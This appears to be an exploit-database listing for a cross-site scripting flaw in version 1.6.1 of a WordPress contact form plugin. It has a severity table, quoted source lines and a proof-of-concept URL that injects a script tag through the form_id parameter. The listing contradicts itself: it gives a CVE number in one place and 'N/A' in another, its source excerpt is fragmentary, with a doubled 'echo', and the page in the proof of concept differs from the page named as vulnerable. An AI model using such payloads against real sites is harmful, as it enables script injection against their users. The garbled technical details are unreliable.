Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2018-15496 | CWE-79 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2020-03-24 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L | 0.5 | 0.7 |
* Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting * Google Dork: N/A * Date: 2020.03.23 * Exploit Author: Milad Karimi * Vendor Homepage: https://wordpress.org/plugins/contact-forms-builder/ * Software Link: https://wordpress.org/plugins/contact-forms-builder/ * Category : webapps * Version: 1.6.1 * Tested on: windows 10 , firefox * CVE : N/A Vulnerable page : /edit-form.php Vulnerable Source: 1094: echo echo $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 130: if(isset($_GET['form_id'])) 1094: if(!empty($cancel_redirect_url)) else POC : http://localhost/code_generator.php?form_id=<script>alert('xss')</script> ************************ * ==> Contact Me : * Telegram : @Ex3ptionaL * Email : [email protected] Email: [email protected] * Instagram : @m.i.l.a.d_._k.a.r.i.m.i ************************
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.